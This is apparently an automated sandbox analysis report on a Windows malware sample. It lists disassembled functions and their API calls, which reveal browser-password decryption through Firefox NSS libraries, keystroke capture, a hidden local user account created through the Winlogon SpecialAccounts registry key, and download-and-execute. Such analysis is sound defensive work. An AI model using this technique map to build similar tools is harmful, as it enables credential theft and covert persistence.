                                                • Instruction Fuzzy Hash: 2F4151B1D00108BBDB119BE5DC45DEFBBBCEF45348F04403AF915E2291E6798E498B65
                                                Function 004120B8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45processCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 004120C7
                                                • Process32First.KERNEL32(00000000,?), ref: 004120F4
                                                • Process32Next.KERNEL32(00000000,?), ref: 0041211B
                                                • CloseHandle.KERNEL32(00000000), ref: 00412126
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                • String ID: explorer.exe
                                                • API String ID: 420147892-3187896405
                                                • Opcode ID: cca27d03e5fee3d13d730dbd736efbc05fad81dc8713c8ee7ea15d75a96c5f8e
                                                • Instruction ID: d4719916d67601202cd1e904b10d4c7f824d655a52d6a3ef4aa10d248f4bb20b
                                                • Opcode Fuzzy Hash: cca27d03e5fee3d13d730dbd736efbc05fad81dc8713c8ee7ea15d75a96c5f8e
                                                • Instruction Fuzzy Hash: 23018675501114BBD720A761AC09FDB77FCDB59710F1000B6FA45E2180EA78DAD18A5D
                                                Function 0040FA42 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135libraryloaderCOMMON
                                                Download Yara Rule
                                                APIs
                                                • LoadLibraryA.KERNEL32(ntdll.dll), ref: 0040FA5A
                                                • GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040FA6A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressLibraryLoadProc
                                                • String ID: RtlGetVersion$ntdll.dll
                                                • API String ID: 2574300362-1489217083
                                                • Opcode ID: 557c9246e3e9a0fef6ff1346138e7464758c16a3ca40db203f206ff61175bc27
                                                • Instruction ID: 70fb968993985f0a901d3934b8f719e9ed9f2b91e277d5e8a0a34c20a60269a7
                                                • Opcode Fuzzy Hash: 557c9246e3e9a0fef6ff1346138e7464758c16a3ca40db203f206ff61175bc27
                                                • Instruction Fuzzy Hash: 1A414530A00128AADF348B55D8663FEB6B4AB51B4DF1044F6E645F06C1E27CDACDDE98
                                                Function 0041002B Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00405F53: GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,770113FB,00000000,00405A34), ref: 00405F56
                                                  • Part of subcall function 00405F53: HeapAlloc.KERNEL32(00000000), ref: 00405F5D
                                                • GetLogicalDriveStringsW.KERNEL32(00000104,00000000), ref: 00410060
                                                • GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 00410087
                                                • GetDriveTypeW.KERNEL32(?,00000000,00000000), ref: 004100B7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Drive$HeapLogicalStrings$AllocProcessType
                                                • String ID: X,@
                                                • API String ID: 2408535517-3523447844
                                                • Opcode ID: b027de69f0b6d5a23312214c4c123ba17e0c7d7763394494c2a7b08cc03c8411
                                                • Instruction ID: 9229edffabc910c33cb15af49934dc6947608b8cd10783d8f4c5320deadfe785
                                                • Opcode Fuzzy Hash: b027de69f0b6d5a23312214c4c123ba17e0c7d7763394494c2a7b08cc03c8411
                                                • Instruction Fuzzy Hash: 22317071E002199BCB14EFA5C5859EFBBB8AF44345F10442FE501B7291EB785E40CBA5
                                                Function 0040A632 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62memoryencryptionstringCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GlobalAlloc.KERNEL32(00000040,-00000001,770145FD,?,?,?,0040A5E6,00001000,?,00000000,00001000), ref: 0040A650
                                                • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0040A5E6), ref: 0040A686
                                                • lstrcpyW.KERNEL32(?,Could not decrypt), ref: 0040A6BD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocCryptDataGlobalUnprotectlstrcpy
                                                • String ID: Could not decrypt
                                                • API String ID: 3112367126-1484008118
                                                • Opcode ID: f80272bcfd7b4012c06c6cd44eca8912b05befecd6a9058f8ec5d6f3f1efb93b
                                                • Instruction ID: 03c4e1aac85c020809a50852f1601ff2c06fb66bbebf65e7d6a161608b570130
                                                • Opcode Fuzzy Hash: f80272bcfd7b4012c06c6cd44eca8912b05befecd6a9058f8ec5d6f3f1efb93b
                                                • Instruction Fuzzy Hash: FC110A729003159BC711CBA9C8449DEF7BCEF88700B14447BE995F3251E6369E51CBA5
                                                Function 0040F56D Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D471,?,?,00000001), ref: 0040F5C2
                                                • LookupAccountSidW.ADVAPI32(00000000,0040D471,?,00000104,?,00000010,?), ref: 0040F5E7
                                                • GetLastError.KERNEL32(?,?,00000001), ref: 0040F5F1
                                                • FreeSid.ADVAPI32(0040D471,?,?,00000001), ref: 0040F5FF
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AccountAllocateErrorFreeInitializeLastLookup
                                                • String ID:
                                                • API String ID: 1866703397-0
                                                • Opcode ID: b0011a36a233918660f51aaeda3ff38362614afdb50e87bc64376f1b46c92c9b
                                                • Instruction ID: 3b598cacf1515ca3802b60831c59e6c5522185c78844e00366c38059d8a2d7b5
                                                • Opcode Fuzzy Hash: b0011a36a233918660f51aaeda3ff38362614afdb50e87bc64376f1b46c92c9b
                                                • Instruction Fuzzy Hash: 4C11E9B190020DBADB10DFD1DC89AEFBBBCEB08745F104476E605E2191E7749A489BA5
                                                Function 0040CC54 Relevance: 6.0, APIs: 4, Instructions: 49encryptionmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC73
                                                • LocalAlloc.KERNEL32(00000040,?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CC81
                                                • CryptStringToBinaryW.CRYPT32(00000000,00000000,00000001,00000000,?,00000000,00000000), ref: 0040CC97
                                                • LocalFree.KERNEL32(?,?,0040CBC6,?,00000000,?,00000000,?), ref: 0040CCA5
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: BinaryCryptLocalString$AllocFree
                                                • String ID:
                                                • API String ID: 4291131564-0
                                                • Opcode ID: 0413e94adcb2339395a87e2e52bcc88541e051b53830691b94a72c27296d8374
                                                • Instruction ID: 9c373eb6a10f65962ee0bde220e476f2e161b831225db717d250f15b1d3c5667
                                                • Opcode Fuzzy Hash: 0413e94adcb2339395a87e2e52bcc88541e051b53830691b94a72c27296d8374
                                                • Instruction Fuzzy Hash: 6E011971601222BFEB214B5BDD4DE97BFACEF497A5B104131FA09E6250E7758C00CAA4
                                                Function 004027D3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82filenetworkCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 0040F76B: SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000), ref: 0040F79C
                                                  • Part of subcall function 00403335: lstrcatW.KERNEL32(00000000,770113FB,?,?,00413589,?,00411515,00413589,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403365
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 0040351D: PathFindExtensionW.SHLWAPI(?), ref: 00403527
                                                • URLDownloadToFileW.URLMON(00000000,00000000,00000000,00000000,00000000), ref: 00402860
                                                • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000005), ref: 0040288A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Path$DownloadExecuteExtensionFileFindFolderFreeShellSpecialVirtuallstrcatlstrcpy
                                                • String ID: open
                                                • API String ID: 4166385161-2758837156
                                                • Opcode ID: d9bd0e0bfe5fa9c8c53351a01cbf13d09493a8175f090d4e793efe39c703bb9a
                                                • Instruction ID: 56fc09243cf5a77592bd22988cbe0d8e1aebbceaa7f86b66998b93a2eb7a4e7b
                                                • Opcode Fuzzy Hash: d9bd0e0bfe5fa9c8c53351a01cbf13d09493a8175f090d4e793efe39c703bb9a
                                                • Instruction Fuzzy Hash: 6D216F75900208B7DB14AFA2C885DEE7B78AFC1319F00806FF416771C1DB785645CB58
                                                Function 0040B15E Relevance: 4.6, APIs: 3, Instructions: 61stringencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • lstrlenA.KERNEL32(?,?,?,00000000,?,0040AA4B,?,?,?,?,?,encryptedUsername,?,?,00000000,C0000000), ref: 0040B17B
                                                • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,?,?,00000000,00000000), ref: 0040B1A9
                                                  • Part of subcall function 00405EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00405EBE
                                                • lstrcpyA.KERNEL32(00000000,?), ref: 0040B1F6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocBinaryCryptStringVirtuallstrcpylstrlen
                                                • String ID:
                                                • API String ID: 573875632-0
                                                • Opcode ID: 237850a45561d8afdd84ed52f6ea1cc7b30d16a63204f57b6bc7a383c55df0d8
                                                • Instruction ID: 1e628b6e4e0e23564231c11d106335a829b2c53438db6e7f5bd85d2f6d685f2b
                                                • Opcode Fuzzy Hash: 237850a45561d8afdd84ed52f6ea1cc7b30d16a63204f57b6bc7a383c55df0d8
                                                • Instruction Fuzzy Hash: E211D6B6D00209AFDB01DF95D8848EFBBBCEB48344F1080BAF505A7251D7359A45CBA4
                                                Function 0040F619 Relevance: 4.6, APIs: 3, Instructions: 60COMMON
                                                Download Yara Rule
                                                APIs
                                                • OpenProcessToken.ADVAPI32(00000000,00000028,?,?,00000000,00000000,?,?,?,?,?,?,?,?,0040E18E), ref: 0040F644
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,?), ref: 0040F655
                                                • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000010,?,?,?,00000000,00000000), ref: 0040F68A
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Token$AdjustLookupOpenPrivilegePrivilegesProcessValue
                                                • String ID:
                                                • API String ID: 658607936-0
                                                • Opcode ID: c6676e19c9dce9a8bc6835bcfd14c0ec21f64ff11388038882d9bdd43d36353e
                                                • Instruction ID: 8332c94ce834d9b4f7767c05631ca274011cc841fa13cb12cd9f11b9cc91c3c6
                                                • Opcode Fuzzy Hash: c6676e19c9dce9a8bc6835bcfd14c0ec21f64ff11388038882d9bdd43d36353e
                                                • Instruction Fuzzy Hash: F6110A75A10219AFEB20CFE5CC849EFFBBCFB48700F10493AA501F2150E7749A058BA0
                                                Function 0040CAFC Relevance: 4.5, APIs: 3, Instructions: 46memoryencryptionCOMMON
                                                Download Yara Rule
                                                APIs
                                                • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?), ref: 0040CB24
                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB3B
                                                • LocalFree.KERNEL32(0040CAD5,?,?,?,?,?,0040CAD5,?,00000000,?,?,?,?,0040CA44), ref: 0040CB5B
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Local$AllocCryptDataFreeUnprotect
                                                • String ID:
                                                • API String ID: 2068576380-0
                                                • Opcode ID: d07056e6058d1041da3554faf4bd58ce6aa8df7867045fc1a761222ec7b01c75
                                                • Instruction ID: 215fa3fe11215347c3d1e171e52ffe0a00858422dd62dca2444b50e8a43090fe
                                                • Opcode Fuzzy Hash: d07056e6058d1041da3554faf4bd58ce6aa8df7867045fc1a761222ec7b01c75
                                                • Instruction Fuzzy Hash: D80100B5900209EFDB059FA5DC0A8EFBBB9EB88311B10416AED41A3350E67599448AA4
                                                Function 0040FF27 Relevance: 3.1, APIs: 2, Instructions: 82fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,?,?), ref: 0040FF54
                                                • FindNextFileW.KERNEL32(00000000,00000010,00000000), ref: 0040FFF6
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileFind$FirstNext
                                                • String ID:
                                                • API String ID: 1690352074-0
                                                • Opcode ID: d2868153f9785a800d3c7c19bd89a0e56c9854feed143a2a1c2cad7e71a544f5
                                                • Instruction ID: 51f66a3543baf517c4de2523c6378d3d031a6120c04ef48b92764a27087f23dd
                                                • Opcode Fuzzy Hash: d2868153f9785a800d3c7c19bd89a0e56c9854feed143a2a1c2cad7e71a544f5
                                                • Instruction Fuzzy Hash: 6D314F71D002099BDB20EFA5C849BEEBBB8AF48315F10417AE401B3291DB78AE84CF54
                                                Function 0040D418 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                Download Yara Rule
                                                APIs
                                                • NetUserAdd.NETAPI32(00000000,00000001,?,00000000,?,00000000,0054E080,?,?,?,0040E634,0054E07C,0054E080), ref: 0040D45A
                                                  • Part of subcall function 0040F56D: AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,0040D471,?,?,00000001), ref: 0040F5C2
                                                  • Part of subcall function 0040F56D: LookupAccountSidW.ADVAPI32(00000000,0040D471,?,00000104,?,00000010,?), ref: 0040F5E7
                                                  • Part of subcall function 0040F56D: GetLastError.KERNEL32(?,?,00000001), ref: 0040F5F1
                                                  • Part of subcall function 0040F56D: FreeSid.ADVAPI32(0040D471,?,?,00000001), ref: 0040F5FF
                                                • NetLocalGroupAddMembers.NETAPI32(00000000,00000000,00000003,00010201,00000001,?,?,?,0040E634,0054E07C,0054E080), ref: 0040D47B
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Free$AccountAllocateErrorGroupInitializeLastLocalLookupMembersUserVirtual
                                                • String ID:
                                                • API String ID: 188019324-0
                                                • Opcode ID: 597690d96667462ad59adff689e7d2223bd5119e156d35c2d7ab40080fe41be3
                                                • Instruction ID: 35dae00ccef6b446e0c841155e11f4e793a47711b1090637ee54e787cfdbff70
                                                • Opcode Fuzzy Hash: 597690d96667462ad59adff689e7d2223bd5119e156d35c2d7ab40080fe41be3
                                                • Instruction Fuzzy Hash: 10110072900208AFDB11DFAAD8849EEF7F8EF59354B10443AF951E7250D7B4AA448B50
                                                Function 0040D0A3 Relevance: 1.5, APIs: 1, Instructions: 40networkCOMMON
                                                Download Yara Rule
                                                APIs
                                                • recv.WS2_32(?,?,00001000,00000000), ref: 0040D0FD
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: recv
                                                • String ID:
                                                • API String ID: 1507349165-0
                                                • Opcode ID: b8ce05e2267d41a055ddfcb89261a2ac0265fef77b176401f6e3574e179a6e53
                                                • Instruction ID: b725e4cad62ebb6751eb6d5db7d7c83580f6971ea39e9a12e705d98c42646a3f
                                                • Opcode Fuzzy Hash: b8ce05e2267d41a055ddfcb89261a2ac0265fef77b176401f6e3574e179a6e53
                                                • Instruction Fuzzy Hash: 7CF0FC7190024867DB11E7A4CC41FE7335CAB083D9F10047AF145F71C4D6F8AD848768
                                                Function 00419172 Relevance: .1, Instructions: 93COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                                • Instruction ID: 32b45bac7427164607efcda96c7a1d2a37098db285ec3ad8997b80a647b6199f
                                                • Opcode Fuzzy Hash: 4f7567a5fbc2f57699485bbede3328af11860cad7103f0f8210cbd2d61708212
                                                • Instruction Fuzzy Hash: B0313075E0061AAFDB14CF98C8E09AEB7F5FF89314B1981AAD401A7711D774EE81CB84
                                                Function 0040F93F Relevance: .1, Instructions: 89COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 70a123d0a38f8f88a807db75fd4d29bf0a4123b82be8a1095914169ea9aca7b1
                                                • Instruction ID: 3cf98475d967d69efdc540c71a22f5173ff4fdfd19d679cdcd5144f8e32d7552
                                                • Opcode Fuzzy Hash: 70a123d0a38f8f88a807db75fd4d29bf0a4123b82be8a1095914169ea9aca7b1
                                                • Instruction Fuzzy Hash: 3421ADB1D00108ABDB15DF99C8C2BEEBB79AF44314F14407BF545FB281E634598587A8
                                                Function 00410620 Relevance: .0, Instructions: 20COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                • Instruction ID: 451d43169ccbb2215ef147c0df9262fe2611908ea92783b9fe1fda873cbde726
                                                • Opcode Fuzzy Hash: 60c1047820937477a62ebe8b3556f1e42973dfa080cef3034b4bd0468cc2296e
                                                • Instruction Fuzzy Hash: 42E08C32200510CBC720DB1AD840993B3B4EBC0370B2A046AE48AE7601C3A8FCE2CA94
                                                Function 0041094E Relevance: .0, Instructions: 11COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                • Instruction ID: c7ffb21236a01e711484f890f9ab4a733e178a674d023b35b9ed1a8d03666c8f
                                                • Opcode Fuzzy Hash: 1a420be4fd1d60918cb23d9961ed4b3e9e51cbd9e1df09b6748f783962a9c5c8
                                                • Instruction Fuzzy Hash: 9FD0EA783619408FDB51CF18C694E02B3E4EB49B60B098491E909CB736D738ED40EA40
                                                Function 00410619 Relevance: .0, Instructions: 2COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                • Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
                                                • Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
                                                • Instruction Fuzzy Hash:
                                                Function 0040B67E Relevance: 47.5, APIs: 10, Strings: 17, Instructions: 219libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetCurrentDirectoryW.KERNEL32(00000104,?,?,00000104,00000000), ref: 0040B6AC
                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B6B5
                                                  • Part of subcall function 0040362D: lstrcpyW.KERNEL32(00000000,770113FB), ref: 00403657
                                                  • Part of subcall function 00403272: wsprintfW.USER32 ref: 0040328D
                                                • PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7A3
                                                • PathFileExistsW.SHLWAPI(0040A760), ref: 0040B7FF
                                                • LoadLibraryW.KERNEL32(?,0040A760,?,00000104,00000000), ref: 0040B83E
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B849
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B854
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B85F
                                                • LoadLibraryW.KERNEL32(?,?,00000104,00000000), ref: 0040B86A
                                                • SetCurrentDirectoryW.KERNEL32(?,?,00000104,00000000), ref: 0040B957
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: LibraryLoad$CurrentDirectory$ExistsFilePath$FreeVirtuallstrcpywsprintf
                                                • String ID: .dll$NSSBase64_DecodeBuffer$NSS_Init$NSS_Shutdown$PK11SDR_Decrypt$PK11_Authenticate$PK11_CheckUserPassword$PK11_FreeSlot$PK11_GetInternalKeySlot$PR_GetError$mozglue.dll$msvcp$msvcp120.dll$msvcr$msvcr120.dll$nss3.dll$softokn3.dll
                                                • API String ID: 410702425-850564384
                                                • Opcode ID: 0eb50f1faf709f0bde6a9787119c38c6d943e26492c92136b83585a01522b8d5
                                                • Instruction ID: 3cd22339cab3e0b34e6d6484c9c52d57fa8d2725b080aa23ef78d8fb8eeae670
                                                • Opcode Fuzzy Hash: 0eb50f1faf709f0bde6a9787119c38c6d943e26492c92136b83585a01522b8d5
                                                • Instruction Fuzzy Hash: 0B91FAB1A00609EBDB04EFB2D8969DEBB79FF54304F10413BA515B7291DB386B44CB98
                                                Function 0040902E Relevance: 40.5, APIs: 22, Strings: 1, Instructions: 277registrystringwindowCOMMON
                                                Download Yara Rule
                                                APIs
                                                • DefWindowProcA.USER32(?,?,?,?), ref: 00409084
                                                • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 004090A1
                                                • GetRawInputData.USER32(?,10000003,00000000,?,00000010), ref: 004090D7
                                                • GetForegroundWindow.USER32 ref: 004090F4
                                                • GetWindowTextW.USER32(00000000,?,00000104), ref: 00409105
                                                • lstrlenW.KERNEL32(-00000210,-00000010,?,Unknow), ref: 004091EE
                                                • PostQuitMessage.USER32(00000000), ref: 00409381
                                                • RegisterRawInputDevices.USER32 ref: 004093B0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000006.00000002.374015317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_6_2_400000_VPZVQXDUT.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InputWindow$Data$DevicesForegroundMessagePostProcQuitRegisterTextlstrlen
                                                • String ID: Unknow
                                                • API String ID: 3853268301-1240069140
                                                • Opcode ID: b1d566fadd52c86fa729ab5ccdd7d07d9617a4ccf85f69fe7327a1be861f1dc8
                                                • Instruction ID: 9779d0e792247a9e55b3318ab2f410e550cd0691825362868d8aeff0002b904c
                                                • Opcode Fuzzy Hash: b1d566fadd52c86fa729ab5ccdd7d07d9617a4ccf85f69fe7327a1be861f1dc8
                                                • Instruction Fuzzy Hash: DFA18C71100200AFC700DF65DC89DAB7BA8FF89344F44853EF949A72A2D739AD14CB69
                                                Function 0040E3FA Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 237registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • InitializeCriticalSection.KERNEL32(?,?,?), ref: 0040E407
                                                • DeleteCriticalSection.KERNEL32(?,?,?), ref: 0040E41E
                                                • EnterCriticalSection.KERNEL32(0054E020,?,?), ref: 0040E42A
                                                  • Part of subcall function 0040DE1F: RegOpenKeyExW.ADVAPI32 ref: 0040DE51
                                                • RegCreateKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList,00000000,00000000,00000000,000F013F,00000000,?,?), ref: 0040E5FF
                                                • RegSetValueExW.ADVAPI32 ref: 0040E61A
                                                • RegCloseKey.ADVAPI32(?), ref: 0040E623
                                                • LeaveCriticalSection.KERNEL32(0054E020,00000000,0054E07C,0054E080,?,?), ref: 0040E65E
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
                                                  • Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
                                                  • Part of subcall function 004035E5: lstrcpyW.KERNEL32(?,00411E02), ref: 00403620
                                                  • Part of subcall function 00403437: lstrcpyW.KERNEL32(00000000,00000000), ref: 0040345C
                                                  • Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD
                                                  • Part of subcall function 00403261: lstrlenW.KERNEL32(770113FB,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,770113FB,00000000), ref: 00403268
